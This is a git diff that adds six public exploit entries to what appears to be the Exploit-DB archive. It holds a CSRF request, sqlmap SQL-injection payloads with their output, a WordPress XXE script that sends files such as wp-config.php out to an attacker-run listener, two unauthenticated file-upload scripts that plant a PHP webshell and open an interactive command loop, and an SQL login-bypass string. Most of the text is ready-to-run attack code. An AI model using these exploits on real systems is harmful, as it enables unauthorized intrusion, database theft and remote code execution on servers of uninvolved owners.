diff --git a/exploits/multiple/webapps/50302.txt b/exploits/multiple/webapps/50302.txt
new file mode 100644
index 000000000..c7daf3fca
--- /dev/null
+++ b/exploits/multiple/webapps/50302.txt
@@ -0,0 +1,74 @@
+# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)
+# Exploit Author: Alperen Ergel
+# Software Homepage: https://www.tsoft.com.tr/
+# Version : v4
+# Tested on: Kali Linux (2021.4) / xammp
+# Category: WebApp
+# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'"
+# Date: 2021-08-15
+######## Description ########
+#
+# Attacker can change admin informaiton
+#
+#
+######## Proof of Concept ########
+
+POST /srv/service/admin/updateuserinfo HTTP/1.1
+
+Host: localhost
+
+Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: application/json, text/javascript, */*; q=0.01
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: application/x-www-form-urlencoded
+
+X-Requested-With: XMLHttpRequest
+
+Content-Length: 74
+
+Origin: http://localhost
+
+Referer: http://localhost/Y/
+
+Te: trailers
+
+Connection: close
+
+
+
+firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595
+
+
+
+
+####### EXPLOIT ##################
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50303.txt b/exploits/php/webapps/50303.txt
new file mode 100644
index 000000000..641a3d56b
--- /dev/null
+++ b/exploits/php/webapps/50303.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
+# Exploit Author: Erwin Krazek (Nero)
+# Date: 17/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
+# Vendor: oretnom23
+# Version: v1.0
+# Tested on: Linux, Apache, Mysql
+# Exploit Description:
+Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.
+
+# Vulnerable Code
+In search.php on line 28
+$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;
+
+Sqlmap command:
+sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch
+
+Output:
+---
+Parameter: search (GET)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 14 columns
+Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
+---
+[17:33:38] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian
+web application technology: Apache 2.4.46, PHP
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+[17:33:38] [INFO] fetching database names
+available databases [4]:
+[*] church_db
+[*] information_schema
+[*] mysql
+[*] performance_schema
\ No newline at end of file
diff --git a/exploits/php/webapps/50304.sh b/exploits/php/webapps/50304.sh
new file mode 100755
index 000000000..ad2671a0c
--- /dev/null
+++ b/exploits/php/webapps/50304.sh
@@ -0,0 +1,175 @@
+# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
+# Date: 16/09/2021
+# Exploit Author: David Utón (M3n0sD0n4ld)
+# Vendor Homepage: https://wordpress.com
+# Affected Version: WordPress 5.6-5.7 & PHP8
+# Tested on: Linux Ubuntu 18.04.5 LTS
+# CVE : CVE-2021-29447
+
+#!/bin/bash
+
+# Author: @David_Uton (m3n0sd0n4ld)
+# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
+# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX
+
+
+# Variables
+rHost=$1
+username=$2
+password=$3
+readFile=$4
+lHost=$5
+
+# Functions
+# Logotype
+logoType(){
+ echo "
+=====================================
+CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
+-------------------------------------
+@David_Uton (M3n0sD0n4ld)
+https://m3n0sd0n4ld.github.io/
+====================================="
+}
+
+# Create wav malicious
+wavCreate(){
+ echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
+}
+
+# Create xx3.dtd
+dtdCreate(){
+cat < xx3.dtd
+
+" >
+EOT
+}
+
+# wav upload
+wavUpload(){
+cat < .upload.py
+#/usr/bin/env python3
+
+import requests, re, sys
+
+postData = {
+ 'log':"$username",
+ 'pwd':"$password",
+ 'wp-submit':'Log In',
+ 'redirect_to':'http://$rHost/wp-admin/',
+ 'testcookie':1
+}
+
+r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True
+
+cookies = r.cookies
+
+print("[+] Getting Wp Nonce ... ")
+
+res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
+wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
+
+if len(wp_nonce_list) == 0 :
+ print("[-] Failed to retrieve the _wpnonce")
+ exit(0)
+else :
+ wp_nonce = wp_nonce_list[0]
+ print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)
+
+print("[+] Uploading the wav file ... ")
+
+postData = {
+ 'name': 'payload.wav',
+ 'action': 'upload-attachment',
+ '_wpnonce': wp_nonce
+}
+
+wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
+r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
+if r_upload.status_code == 200:
+ image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
+ _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
+ print('[+] Wav uploaded successfully')
+else :
+ print("[-] Failed to receive a response for uploaded! Try again . \n")
+ exit(0)
+EOT
+python3 .upload.py
+}
+
+# Server Sniffer
+serverSniffer(){
+ statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
+}
+
+# Load file and decoder
+loadFile(){
+ content="http.server.log"
+ wavUpload
+
+ while :
+ do
+ if [[ -s $content ]]; then
+ echo "[+] Obtaining file information..."
+ sleep 5s # Increase time if the server is slow
+
+ base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)
+
+ # Check file exists
+ echo "" > decode.php
+ sizeCheck=$(wc -c decode.php | awk '{printf $1}')
+ if [[ $sizeCheck -gt "46" ]]; then
+ php decode.php
+ else
+ echo "[!] File does not exist or is not allowed to be read."
+ fi
+ break
+ fi
+ done
+}
+
+# Cleanup
+cleanup(){
+ kill $(cat http.server.pid) &>/dev/null
+ rm http.server.log http.server.pid &>/dev/null
+ rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
+}
+
+
+# Execute
+logoType
+
+# Checking parameters
+if [[ $# -ne 5 ]];then
+ echo "[!] Parameters are missing!!!"
+ echo ""
+ echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
+else
+
+ # Test Connection...
+ echo "[*] Test connection to WordPress..."
+
+ # WP Auth
+ authCheck=$(curl -i -s -k -X $'POST' \
+ -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'wordpress_test_cookie=WP%20Cookie%20check' \
+ --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
+"http://$rHost/wp-login.php" > .cookies.tmp)
+
+ auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')
+
+ # Running authentication with WordPress.
+
+ if [[ $auth != "302" ]]; then
+ echo "[-] Authentication failed ! Check username and password"
+ else
+ echo "[+] Authentication successfull!!!"
+
+ # Create wav & dtd file
+ wavCreate
+ dtdCreate
+ serverSniffer
+ loadFile
+ cleanup
+ fi
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/50305.py b/exploits/php/webapps/50305.py
new file mode 100755
index 000000000..61bbd4996
--- /dev/null
+++ b/exploits/php/webapps/50305.py
@@ -0,0 +1,182 @@
+# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Exploit Author: Abdullah Khawaja (hax.3xploit)
+# Date: 2021-09-20
+# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
+# Version: 2.0
+# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
+# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+
+# Exploit Details:
+
+# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session.
+# 2. Set the 'action' parameter of the POST request to 'save_settings'.
+# - `ajax.php?action=save_settings`
+# 3. Capture request in burp and replace with with following request.
+
+'''
+POST /fos/admin/ajax.php?action=save_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251
+Content-Length: 754
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/fos/admin/index.php?page=site_settings
+Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="name"
+
+adsa
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="email"
+
+asdsad@asda.com
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="contact"
+
+asdsad
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="about"
+
+asdsad
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="img"; filename="phpinfo.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------120025571041714278883588636251--
+'''
+# ` Image uploader is renaming your payload using the following function.
+ # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+ # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
+ # and print this function to get the value. e.g: Output: 1632085200
+ # concate output with your playload name like this 1632085200_phpinfo.php
+# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests.
+
+# RCE via executing exploit:
+ # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py
+ # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/
+
+
+import requests, sys, urllib, re
+import datetime
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+
+
+
+header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
+
+print(Style.BRIGHT+" Online Food Ordering System v2.0")
+print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
+print(header)
+
+print(r"""
+ ______ _______ ________
+ ___ //_/__ /_______ ___ _______ ______(_)_____ _
+ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
+ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
+ /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
+ /___/
+ abdullahkhawaja.com
+ """)
+
+
+
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+#Create a new session
+s = requests.Session()
+
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+
+def webshell(LINK, session):
+ try:
+ WEB_SHELL = LINK+'/assets/img/'+filename
+ getdir = {'cmd': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = input(term)
+ command = {'cmd': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+
+#Creating a PHP Web Shell
+
+phpshell = {
+ 'img':
+ (
+ 'shell.php',
+ '',
+ 'application/octet-stream',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+
+# Defining value for form data
+data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'}
+
+
+def id_generator():
+ x = datetime.datetime.now()
+ date_string = x.strftime("%y-%m-%d %H:%M")
+ date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
+ timestamp = datetime.datetime.timestamp(date)
+ file = int(timestamp)
+ final_name = str(file)+'_shell.php'
+ return final_name
+
+filename = id_generator()
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data)
+
+shell_upload = True if("1" in upload.text) else False
+u=shell_upload
+if u:
+ print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+ print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/50306.py b/exploits/php/webapps/50306.py
new file mode 100755
index 000000000..b40358cd0
--- /dev/null
+++ b/exploits/php/webapps/50306.py
@@ -0,0 +1,193 @@
+# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Exploit Author: Abdullah Khawaja
+# Date: 2021-09-20
+# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
+# Version: 1.0
+# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
+# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+
+# Exploit Details:
+
+# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
+# 2. Set the 'f' parameter of the POST request to 'save'.
+# - `Users.php?f=save`
+# 3. Capture request in burp and replace with with following request.
+'''
+POST /church_management/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
+Content-Length: 859
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/church_management/admin/?page=user
+Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="firstname"
+
+Adminstrator
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="lastname"
+
+Admin
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="img"; filename="phpinfo.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------91105564325608762312322546550--
+
+'''
+# ` Image uploader is renaming your payload using the following function.
+ # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+ # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
+ # and print this function to get the value. e.g: Output: 1632085200
+ # concate output with your playload name like this 1632085200_phpinfo.php
+# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.
+
+# RCE via executing exploit:
+ # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
+ # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/
+
+
+import requests, sys, urllib, re
+import datetime
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
+
+print(Style.BRIGHT+" Church Management System v1.0")
+print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
+print(header)
+
+print(r"""
+
+
+ .----------.
+ .-''-. / /
+ . __ __ ___ .' .-. ) / ______.'
+ .'| | |/ `.' `. / .' / / / /_
+ .' | | .-. .-. ' (_/ / / / '''--.
+< | __ __ | | | | | | ,.----------. / / '___ `.
+ | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. |
+ | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) |
+ | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' /
+ | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'`
+ | | \ \ / / | |_/ / | |_ / /.-'_.' '------'''
+ ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.'
+'------' '---'`--' `" `--' `" ( _.-'
+
+ abdullahkhawaja.com
+ """)
+
+
+
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+#Create a new session
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+
+s = requests.Session()
+
+
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+
+def webshell(LINK, session):
+ try:
+ WEB_SHELL = LINK+'uploads/'+filename
+ getdir = {'cmd': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = input(term)
+ command = {'cmd': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+
+#Creating a PHP Web Shell
+
+phpshell = {
+ 'img':
+ (
+ 'shell.php',
+ '',
+ 'application/octet-stream',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+
+# Defining value for form data
+data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}
+
+
+def id_generator():
+ x = datetime.datetime.now()
+ date_string = x.strftime("%y-%m-%d %H:%M")
+ date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
+ timestamp = datetime.datetime.timestamp(date)
+ file = int(timestamp)
+ final_name = str(file)+'_shell.php'
+ return final_name
+
+filename = id_generator()
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)
+
+shell_upload = True if("Undefined index: id in" in upload.text) else False
+u=shell_upload
+if u:
+ print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+ print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt
new file mode 100644
index 000000000..8aedae48d
--- /dev/null
+++ b/exploits/php/webapps/50307.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
+# Exploit Author: Prunier Charles-Yves
+# Date: September 20, 2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
+# Tested on: Linux, windows
+# Vendor: oretnom23
+# Version: v1.0
+
+# Exploit Description:
+Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
+allowing the attacker to login with admin acount
+
+
+----- PoC: Authentication Bypass -----
+
+Administration Panel: http://localhost/expense_budget/admin/login.php
+
+Username: admin' or ''=' --
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8791f8482..6b4e46cf0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44420,3 +44420,9 @@ id,file,description,date,author,type,platform,port
50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php,
50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php,
50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php,
+50302,exploits/multiple/webapps/50302.txt,"T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,multiple,
+50303,exploits/php/webapps/50303.txt,"Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)",1970-01-01,"Erwin Krazek",webapps,php,
+50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php,
+50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,